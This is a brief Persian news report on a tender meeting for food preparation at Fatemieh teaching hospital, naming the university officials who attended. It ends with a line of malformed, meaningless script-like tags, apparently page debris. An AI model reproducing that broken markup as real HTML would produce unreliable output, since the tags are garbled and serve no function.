مناقصه تهیه و طبخ غذای مرکز آموزشی درمانی فاطمیه

جلسه مناقصه تهیه وطبخ غذای مرکز آموزشی درمانی تخصصی و فوق تخصصی فاطمیه در دفتر مدیریت امور رفاهی و پشتیبانی دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مناقصه تهیه وطبخ غذای مرکز آموزشی درمانی تخصصی و فوق تخصصی فاطمیه با حضور آقایانی مدیر امور رفاهی و پشتیبانی، حلافی مدیر امور مالی، دکتر نیاستی مدیر پایش، بودجه و عملکرد دانشگاه، دکتر جوزی مدیر مرکز آموزشی درمانی فاطمیه و دیگر کارشناسان مربوطه برگزار شد.

در این جلسه به مسائلی همچون، انتخاب پیمانکار، کیفیت و نحوه طبخ غذای با کیفیت برای رفاه حال بیماران و کارکنان مرکز آموزشی درمانی مذکور و … پرداخته شد و نقاط قوت و قابل بهبود بررسی گردید.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>